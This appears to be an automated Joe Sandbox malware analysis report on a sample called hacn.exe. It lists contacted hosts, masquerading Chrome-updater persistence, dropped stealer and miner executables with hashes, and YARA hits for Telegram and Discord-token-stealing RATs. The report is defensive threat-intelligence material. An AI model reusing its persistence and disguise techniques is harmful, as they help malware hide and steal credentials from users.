https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy	hacn.exe, 00000001.00000003.1656455258.000001E4E4505000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1663171779.000001E4E44D5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1663621476.000001E4E452B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1664004818.000001E4E44D6000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1663803211.000001E4E452B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1663028720.000001E4E4527000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000002.1665270780.000001E4E44D6000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1663944148.000001E4E452B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1654402774.000001E4E4534000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1654233604.000001E4E4532000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1662960755.000001E4E4523000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1663139978.000001E4E44C5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1662672451.000001E4E451F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.sqlite.org/copyright.html	main.exe	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	false
185.199.111.133	raw.githubusercontent.com	Netherlands	54113	FASTLYUS	false
142.202.242.43	unknown	Reserved	14315	1GSERVERSUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1401452
Start date and time:	2024-03-01 15:21:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 20s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	52
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	6
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	hacn.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.mine.winEXE@78/35@3/3
EGA Information:	Successful, ratio: 78.6%
HCA Information:	Successful, ratio: 54% Number of executed functions: 190 Number of non-executed functions: 245
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): Conhost.exe, conhost.exe, WmiPrvSE.exe, schtasks.exe
Excluded IPs from analysis (whitelisted): 20.114.59.183, 72.21.81.240, 52.165.164.15, 13.85.23.206, 20.190.190.195, 20.190.190.131, 20.190.190.193, 20.190.190.132, 40.126.62.129, 20.190.190.129, 40.126.62.131, 40.126.62.132
Excluded domains from analysis (whitelisted): google.com, prdv4a.aadg.msidentity.com, slscr.update.microsoft.com, wu.ec.azureedge.net, www.tm.v4.a.prd.aadg.trafficmanager.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, wu.azureedge.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, api.telegram.org, glb.sls.prod.dcat.dsp.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net
Execution Graph export aborted for target hacn.exe, PID 7588 because there are no executed function
Execution Graph export aborted for target setup.exe, PID 7768 because it is empty
Execution Graph export aborted for target updater.exe, PID 1436 because it is empty
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: hacn.exe

Simulations

Behavior and APIs

Time	Type	Description
14:22:04	Task Scheduler	Run new task: GoogleUpdateTaskMachineQC path: %ProgramFiles%\Google\Chrome\updater.exe
14:22:21	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ChromeUpdate C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe
14:22:30	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ChromeUpdate C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe
15:21:58	API Interceptor	1x Sleep call for process: setup.exe modified
15:21:59	API Interceptor	40x Sleep call for process: powershell.exe modified
15:22:00	API Interceptor	45x Sleep call for process: main.exe modified
15:22:03	API Interceptor	1x Sleep call for process: updater.exe modified
15:22:35	API Interceptor	306143x Sleep call for process: winlogon.exe modified
15:22:37	API Interceptor	230672x Sleep call for process: lsass.exe modified
15:22:37	API Interceptor	669x Sleep call for process: svchost.exe modified
15:22:40	API Interceptor	276939x Sleep call for process: dwm.exe modified
15:22:51	API Interceptor	1372x Sleep call for process: dialer.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
208.95.112.1	RFQ_C3682402292141.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	SecuriteInfo.com.Trojan.PackedNET.2722.8886.30772.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	RFQ.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	ip-api.com/line/?fields=hosting
	6100853601.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	ip-api.com/line/?fields=hosting
	P2P-Q-2401-001.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	ip-api.com/line/?fields=hosting
	NEW QUOTE-- 002177700XXXXX024.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	ip-api.com/line/?fields=hosting
	Order 72005918536.bat.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	ip-api.com/line/?fields=hosting
	NEW QUOTE-- 002177700XXXXX024.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	ip-api.com/line/?fields=hosting
	doc20242902025126.img	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	SecuriteInfo.com.FileRepMalware.31003.15058.exe	Get hash	malicious	Python Stealer	Browse	ip-api.com/json/?fields=8195
185.199.111.133	Excel2PPT.xlsm	Get hash	malicious	Unknown	Browse
	https://mirror.accuris.ca	Get hash	malicious	Unknown	Browse
	https://github.com/maurice-daly/DriverAutomationTool/tree/master/Current%20Branch/7.2.3	Get hash	malicious	Unknown	Browse
	https://github.com/martinvonz/jj/releases/download/v0.14.0/jj-v0.14.0-x86_64-pc-windows-msvc.zip	Get hash	malicious	Unknown	Browse
	https://kembaliketarifnormal-6500bni.pages.dev/IP:	Get hash	malicious	HTMLPhisher	Browse
	https://www.canva.com/design/DAF-AKdx1iQ/gxF6_iQ8jJGpA-rLPIarSw/view?utm_content=DAF-AKdx1iQ&utm_campaign=designshare&utm_medium=link&utm_source=editor	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.FileRepMalware.12702.1729.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.FileRepMalware.12702.1729.exe	Get hash	malicious	Unknown	Browse
	https://konfirmasi-tarif-bnl-2024.info-danna.bio/	Get hash	malicious	Unknown	Browse
	https://www.canva.com/design/DAF9ieWTRUA/qd9fhkO_FE-gSZCqgu9EwQ/view?utm_co	Get hash	malicious	Unknown	Browse
142.202.242.43	LUFkhhOJGJ.exe	Get hash	malicious	Phonk Miner, Xmrig	Browse
	FV0mIIfKwQ.exe	Get hash	malicious	Amadey, RisePro Stealer, SmokeLoader, Stealc	Browse
	AffoeAIM.exe	Get hash	malicious	PureLog Stealer, Xmrig	Browse
	FxeLOSQQNf.exe	Get hash	malicious	Xmrig	Browse
	AvzR5wP0YM.exe	Get hash	malicious	Xmrig	Browse
	1FTe3IQdAZ.exe	Get hash	malicious	Xmrig	Browse
	Bbd9GbGTz6.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, RisePro Stealer, Xmrig	Browse
	SecuriteInfo.com.Win32.PWSX-gen.11847.1098.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, Xmrig	Browse
	MdO7pWHaxQ.exe	Get hash	malicious	LummaC, Amadey, Fabookie, Glupteba, LummaC Stealer, PureLog Stealer, RedLine	Browse
	RGAVGSoWvM.exe	Get hash	malicious	LummaC, Amadey, PureLog Stealer, RedLine, Stealc, Xmrig, zgRAT	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
raw.githubusercontent.com	Excel2PPT.xlsm	Get hash	malicious	Unknown	Browse	185.199.111.133
	https://flow.page/protected__file0	Get hash	malicious	Unknown	Browse	185.199.108.133
	https://github.com/maurice-daly/DriverAutomationTool/tree/master/Current%20Branch/7.2.3	Get hash	malicious	Unknown	Browse	185.199.111.133
	https://kembaliketarifnormal-6500bni.pages.dev/IP:	Get hash	malicious	HTMLPhisher	Browse	185.199.111.133
	SecuriteInfo.com.FileRepMalware.29389.28556.exe	Get hash	malicious	Unknown	Browse	185.199.108.133
	SecuriteInfo.com.FileRepMalware.29389.28556.exe	Get hash	malicious	Unknown	Browse	185.199.108.133
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, RedLine, RisePro Stealer	Browse	185.199.111.133
	https://bank-bni.perubahantarif.uk/	Get hash	malicious	HTMLPhisher	Browse	185.199.108.133
	SecuriteInfo.com.FileRepMalware.12702.1729.exe	Get hash	malicious	Unknown	Browse	185.199.111.133
	SecuriteInfo.com.FileRepMalware.12702.1729.exe	Get hash	malicious	Unknown	Browse	185.199.111.133
pool.hashvault.pro	FwaFVifk8s.exe	Get hash	malicious	Xmrig	Browse	142.202.242.43
	file.exe	Get hash	malicious	Xmrig	Browse	142.202.242.45
	LUFkhhOJGJ.exe	Get hash	malicious	Phonk Miner, Xmrig	Browse	142.202.242.45
	W1nnerFree CS2.exe	Get hash	malicious	LoaderBot, Xmrig	Browse	142.202.242.45
	AffoeAIM.exe	Get hash	malicious	PureLog Stealer, Xmrig	Browse	142.202.242.45
	FxeLOSQQNf.exe	Get hash	malicious	Xmrig	Browse	142.202.242.45
	AvzR5wP0YM.exe	Get hash	malicious	Xmrig	Browse	142.202.242.43
	1FTe3IQdAZ.exe	Get hash	malicious	Xmrig	Browse	142.202.242.43
	Bbd9GbGTz6.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, RisePro Stealer, Xmrig	Browse	142.202.242.43
	SecuriteInfo.com.Win32.PWSX-gen.11847.1098.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, Xmrig	Browse	142.202.242.43
ip-api.com	RFQ_C3682402292141.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	SecuriteInfo.com.Trojan.PackedNET.2722.8886.30772.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	RFQ.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	6100853601.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	http://4837489289293032093930290390239203fjdhdfjkj3o939020923090932.kovacscorers.com	Get hash	malicious	Phisher	Browse	38.91.101.241
	P2P-Q-2401-001.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	NEW QUOTE-- 002177700XXXXX024.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	Order 72005918536.bat.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	NEW QUOTE-- 002177700XXXXX024.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	doc20242902025126.img	Get hash	malicious	AgentTesla	Browse	208.95.112.1

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
FASTLYUS	Phoenix5b.ipa	Get hash	malicious	Unknown	Browse	151.101.195.6
	https://hastebin.com/share/ogamarelir.xml	Get hash	malicious	NTLM Hash Stealer	Browse	199.232.36.157
	https://advantecho365-my.sharepoint.com/:f:/g/personal/amanda_eriksen_advantech_com/EpP8vYfyU_RBi6SdtjWUdQQBIRJulWRqRSHZIQe3X4fLjA?e=jQHC24	Get hash	malicious	HTMLPhisher	Browse	151.101.130.137
	Excel2PPT.xlsm	Get hash	malicious	Unknown	Browse	185.199.111.133
	https://gamma.app/docs/youve-a-new-docs-for-review-vgsyccn27n6jonp	Get hash	malicious	Unknown	Browse	151.101.129.140
	https://www.smore.com/n/s5npf	Get hash	malicious	Unknown	Browse	199.232.36.84
	_Btach81920_Payment_exka35_html.html	Get hash	malicious	HTMLPhisher	Browse	151.101.129.229
	https://acrobat.adobe.com/id/urn:aaid:sc:EU:119a0b26-1322-4f61-94de-30ab350fbf9c	Get hash	malicious	Unknown	Browse	151.101.66.49
	https://flow.page/protected__file0	Get hash	malicious	Unknown	Browse	151.101.130.208
	SecuriteInfo.com.Win32.TrojanX-gen.18566.17153.exe	Get hash	malicious	Unknown	Browse	199.232.36.193
TUT-ASUS	RFQ_C3682402292141.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	SecuriteInfo.com.Trojan.PackedNET.2722.8886.30772.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	RFQ.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	6100853601.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	P2P-Q-2401-001.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	NEW QUOTE-- 002177700XXXXX024.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	Order 72005918536.bat.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	NEW QUOTE-- 002177700XXXXX024.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	doc20242902025126.img	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	SecuriteInfo.com.FileRepMalware.31003.15058.exe	Get hash	malicious	Python Stealer	Browse	208.95.112.1
1GSERVERSUS	JUSTIFICANTE DE PAGO PDF.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	142.202.240.89
	FwaFVifk8s.exe	Get hash	malicious	Xmrig	Browse	142.202.242.45
	file.exe	Get hash	malicious	Xmrig	Browse	142.202.242.45
	LUFkhhOJGJ.exe	Get hash	malicious	Phonk Miner, Xmrig	Browse	142.202.242.43
	transfer - 9783423-52323-248.263.pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	207.32.217.188
	Factura para el pago 07848956897.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	207.32.217.188
	W1nnerFree CS2.exe	Get hash	malicious	LoaderBot, Xmrig	Browse	142.202.242.45
	pago-02-04T142248.263.pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	142.202.240.89
	FV0mIIfKwQ.exe	Get hash	malicious	Amadey, RisePro Stealer, SmokeLoader, Stealc	Browse	142.202.242.43
	AffoeAIM.exe	Get hash	malicious	PureLog Stealer, Xmrig	Browse	142.202.242.43

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	TEL_147051470514705RECHNUNG_14705.js	Get hash	malicious	NetSupport RAT	Browse	185.199.111.133
	CORRECTION_FORM_CF1_txt.lnk.lnk	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer, RedLine, zgRAT	Browse	185.199.111.133
	ShareGate.24.2.3.msi	Get hash	malicious	Unknown	Browse	185.199.111.133
	5567890333.wsf	Get hash	malicious	XWorm	Browse	185.199.111.133
	RFQ.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	185.199.111.133
	6100853601.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	185.199.111.133
	https://prezi.com/i/view/LuKHYK7cLAwaQgyih2E9	Get hash	malicious	Unknown	Browse	185.199.111.133
	bc car seat laws 2954.js	Get hash	malicious	Unknown	Browse	185.199.111.133
	bc car seat laws 2954.js	Get hash	malicious	Unknown	Browse	185.199.111.133
	https://admortonco-my.sharepoint.com/:f:/p/chris/Eqm6Y75QIl1CrUSFMrfbwLABZUl5hkjU4nihAZ0iqeCvsQ?e=ydgOgS	Get hash	malicious	HTMLPhisher	Browse	185.199.111.133

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\_MEI75722\VCRUNTIME140.dll	https://storage.googleapis.com/vectric_public/Cut2DDesktopTrialEdition_Setup.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Trojan.PWS.Stealer.38408.30550.27254.exe	Get hash	malicious	Unknown	Browse
	tts.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Python.Muldrop.25.8678.4056.exe	Get hash	malicious	Blank Grabber	Browse
	gG5vKnBFax.exe	Get hash	malicious	Unknown	Browse
	47YnqNpB7R.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	OPPVXcEaPW.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	SecuriteInfo.com.W64.S-8cfa6ebc.Eldorado.16653.18215.exe	Get hash	malicious	Unknown	Browse
	tOCTdBymcy.exe	Get hash	malicious	DCRat	Browse
	PpQMwNh.exe	Get hash	malicious	Blank Grabber	Browse
C:\Users\user\AppData\Local\Temp\Costura\A54E036D2DCD19384E8EA53862E0DD8F\64\sqlite.interop.dll	conhost.exe	Get hash	malicious	Discord Token Stealer, Millenuim RAT	Browse
	file.exe	Get hash	malicious	Discord Token Stealer, Millenuim RAT	Browse

Created / dropped Files

C:\Program Files\Google\Chrome\updater.exe

Download File

Process:	C:\ProgramData\setup.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	5617152
Entropy (8bit):	7.71585644239634
Encrypted:	false
SSDEEP:	98304:Dei3W2HJn8hqIOLmRLRSo+QqvCRs19A3JIkLJQrAtjRQii7yXdmMpy2N:6Z2i4OcxQECE6ZIkLJIAt8y4
MD5:	1274CBCD6329098F79A3BE6D76AB8B97
SHA1:	53C870D62DCD6154052445DC03888CDC6CFFD370
SHA-256:	BBE5544C408A6EB95DD9980C61A63C4EBC8CCBEECADE4DE4FAE8332361E27278
SHA-512:	A0FEBBD4915791D3C32531FB3CF177EE288DD80CE1C8A1E71FA9AD59A4EBDDEEF69B6BE7F3D19E687B96DC59C8A8FA80AFFF8378A71431C3133F361B28E0D967
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d......................(.v....U................@.............................PV.......U...`... ...............................................V......0V.......U..............@V.x.............................U.(.....................V.X............................text....u.......v..................`..`.data...`.U.......U..z..............@....rdata..`.....U......\|U.............@..@.pdata........U.......U.............@..@.xdata........U.......U.............@..@.bss.... .....U..........................idata........V.......U.............@....CRT....`.....V.......U.............@....tls......... V.......U.............@....rsrc........0V.......U.............@....reloc..x....@V.......U.............@..B........................................................................................................................................................................

C:\ProgramData\main.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	5872343
Entropy (8bit):	7.487098045911562
Encrypted:	false
SSDEEP:	98304:nsl27OuKr+gvhf2U9Nzm31PMoslkqXf0FvUcwti78OqJ7TPBvc8X6UcR6s:nPOuK6mn9NzgMoYkSIvUcwti7TQlvciA
MD5:	DE8515E07D1C34FFF3C1DDD4FEE593FB
SHA1:	A27A35EC375BADC2B4C6AA73208DEF10B51DAC2D
SHA-256:	0DC68AE03B47614770A09DAFD37DA88B86358D09C6DF9D54AEC2A665F4972406
SHA-512:	3C2065D4F8D2DFF3819BBB34D1E77F6CE68884434258D2FD9893EAAAADA302B309E8E4E94EA0F9798145E6E3AAB850A2234AA1216896934BC03679F8A35C2A0F
Malicious:	true
Yara Hits:	Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\ProgramData\main.exe, Author: Joe Security Rule: JoeSecurity_DiscordTokenStealer, Description: Yara detected Discord Token Stealer, Source: C:\ProgramData\main.exe, Author: Joe Security Rule: JoeSecurity_MillenuimRAT, Description: Yara detected Millenuim RAT, Source: C:\ProgramData\main.exe, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\ProgramData\main.exe, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\ProgramData\main.exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 66%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0...Y...........Y.. ........@.. ........................Z...........`.................................l.Y.O.....Y.@.....................Y.......Y.8............................................ ............... ..H............text....Y.. ....Y................. ..`.rsrc...@.....Y.......Y.............@..@.reloc........Y.......Y.............@..B..................Y.....H.........X.. ...............W..........................................(......(......{...."..}......F.{....o....s.......2...{....o..../..{.....o.....s,......(....,.(........2...{....o....2..{.....o.....{......o......s,...v..(....,.(.......{.....o....2.{....o.......2...{....o....2...{.....o.....{.....o....>.{.....o....&...0..k.......s......{.....{....o....o.....{....o.....+&..(.......(....,...o[...oW...+...oW.....(....-...........o......*.......(.3[......>..s

C:\ProgramData\setup.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	5617152
Entropy (8bit):	7.71585644239634
Encrypted:	false
SSDEEP:	98304:Dei3W2HJn8hqIOLmRLRSo+QqvCRs19A3JIkLJQrAtjRQii7yXdmMpy2N:6Z2i4OcxQECE6ZIkLJIAt8y4
MD5:	1274CBCD6329098F79A3BE6D76AB8B97
SHA1:	53C870D62DCD6154052445DC03888CDC6CFFD370
SHA-256:	BBE5544C408A6EB95DD9980C61A63C4EBC8CCBEECADE4DE4FAE8332361E27278
SHA-512:	A0FEBBD4915791D3C32531FB3CF177EE288DD80CE1C8A1E71FA9AD59A4EBDDEEF69B6BE7F3D19E687B96DC59C8A8FA80AFFF8378A71431C3133F361B28E0D967
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d......................(.v....U................@.............................PV.......U...`... ...............................................V......0V.......U..............@V.x.............................U.(.....................V.X............................text....u.......v..................`..`.data...`.U.......U..z..............@....rdata..`.....U......\|U.............@..@.pdata........U.......U.............@..@.xdata........U.......U.............@..@.bss.... .....U..........................idata........V.......U.............@....CRT....`.....V.......U.............@....tls......... V.......U.............@....rsrc........0V.......U.............@....reloc..x....@V.......U.............@..B........................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\main.exe.log

Download File

Process:	C:\ProgramData\main.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1678
Entropy (8bit):	5.369913341429046
Encrypted:	false
SSDEEP:	48:MxHKQwYHKGSI6ogLHitHTHhAHKKkyHpHNp51qHGIs0HKD:iqbYqGSI6ogLCtzHeqKkyJtp5wmj0qD
MD5:	47EF549ED9A6077539E2B7E16049BF8F
SHA1:	2129E12D767465A7F083AB906EB481DB88B47D0E
SHA-256:	ABACC0BCEB0B100C7FDC2DDDF3CDDCCB8C048466FD886D0A015AB49D5B0A38A7
SHA-512:	EB77CA4097CD1F268E6462D7FA3F864700B7113A637C755FCFF843A01DE6088A7B3588D2CFD1C6C9F018E93783019E338793E7EC5FC29BDBCE6E6604AEB91A99
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Dynamic, Version=4.0.0.0, Culture=neutral, PublicKey

C:\Users\user\AppData\Local\Microsoft\Vault\UserProfileRoaming\Latest.dat

Download File

Process:	C:\Windows\System32\lsass.exe
File Type:	very short file (no magic)
Category:	modified
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	93B885ADFE0DA089CDF634904FD59F71
SHA1:	5BA93C9DB0CFF93F52B521D7420E43F6EDA2784F
SHA-256:	6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
SHA-512:	B8244D028981D693AF7B456AF8EFA4CAD63D282E19FF14942C246E50D9351D22704A802A71C3580B6370DE4CEB293C324A8423342557D4E5C38438F0E36910EE
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:Nlllul3nqth:NllUa
MD5:	851531B4FD612B0BC7891B3F401A478F
SHA1:	483F0D1E71FB0F6EFF159AA96CC82422CF605FB3
SHA-256:	383511F73A5CE9C50CD95B6321EFA51A8C6F18192BEEBBD532D4934E3BC1071F
SHA-512:	A22D105E9F63872406FD271EF0A545BD76974C2674AEFF1B3256BCAC3C2128B9B8AA86B993A53BF87DBAC12ED8F00DCCAFD76E8BA431315B7953656A4CB4E931
Malicious:	false
Preview:	@...e.................................&..............@..........

C:\Users\user\AppData\Local\Temp\Costura\A54E036D2DCD19384E8EA53862E0DD8F\64\sqlite.interop.dll

Download File

Process:	C:\ProgramData\main.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1829040
Entropy (8bit):	6.564424655402829
Encrypted:	false
SSDEEP:	49152:c9EeNSPwEW3cFSI4Tfm3hvbHsjAJcAMkP3:c9Nzm31PMo3
MD5:	65CCD6ECB99899083D43F7C24EB8F869
SHA1:	27037A9470CC5ED177C0B6688495F3A51996A023
SHA-256:	ABA67C7E6C01856838B8BC6B0BA95E864E1FDCB3750AA7CDC1BC73511CEA6FE4
SHA-512:	533900861FE36CF78B614D6A7CE741FF1172B41CBD5644B4A9542E6CA42702E6FBFB12F0FBAAE8F5992320870A15E90B4F7BF180705FC9839DB433413860BE6D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: conhost.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........nN\.. ... ... .Q..... .Q...e. .Q..... ..Q#... ..Q%... ..Q$... .8..... ..].... ...!.~. .rQ(... .rQ ... .wQ.... .rQ"... .Rich.. .........................PE..d.....d.........." ................................................................6U....`.................................................P...x................!.......T...........@..p............................A...............................................text...0........................... ..`.rdata...1.......2..................@..@.data....`... ...J..................@....pdata...!......."...P..............@..@.gfids...............r..............@..@.rsrc................t..............@..@.reloc...............~..............@..B................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI75722\VCRUNTIME140.dll

Download File

Process:	C:\Users\user\Desktop\hacn.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	98224
Entropy (8bit):	6.452201564717313
Encrypted:	false
SSDEEP:	1536:ywqHLG4SsAzAvadZw+1Hcx8uIYNUzUoHA4decbK/zJNuw6z5U:ytrfZ+jPYNzoHA4decbK/FNu51U
MD5:	F34EB034AA4A9735218686590CBA2E8B
SHA1:	2BC20ACDCB201676B77A66FA7EC6B53FA2644713
